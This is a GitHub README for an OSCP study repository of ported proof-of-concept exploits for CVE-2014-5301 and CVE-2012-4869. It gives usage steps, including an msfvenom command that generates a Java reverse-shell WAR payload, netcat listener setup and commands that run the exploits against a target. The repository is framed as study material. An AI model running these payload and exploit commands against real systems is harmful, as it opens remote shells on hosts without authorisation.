Skip to content

AndyCyberSec/OSCP

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
 
 
 
 
 
 

Repository files navigation

OSCP

This is a repository which contains custom/ported POC exploits. They have been made for study and learning purposes. Currently under development.

35845.py

CVE: 2014-5301

OSVDB: 116733

URL: https://seclists.org/fulldisclosure/2015/Jan/5

Original metasploit module: https://www.exploit-db.com/exploits/35845

Usage

35845.py file.war host port
  1. First create reverse shell payload
msfvenom -p java/shell_reverse_tcp LHOST=<ip address> LPORT=4444 -f war > shell.war
  1. Start netcat listener

  2. Run the script

35845.py shell.war 192.168.1.1 8080

Note: The exploit may require multiple run to get it working. Don't give up!

18650.py

CVE: 2012-4869

URL: https://seclists.org/fulldisclosure/2012/Mar/234

Original code: https://www.exploit-db.com/exploits/18650

Usage

Edit the file and change rhost, lhost, lport

  1. Start netcat listener on the port you configured

  2. Run the script

python 18650.py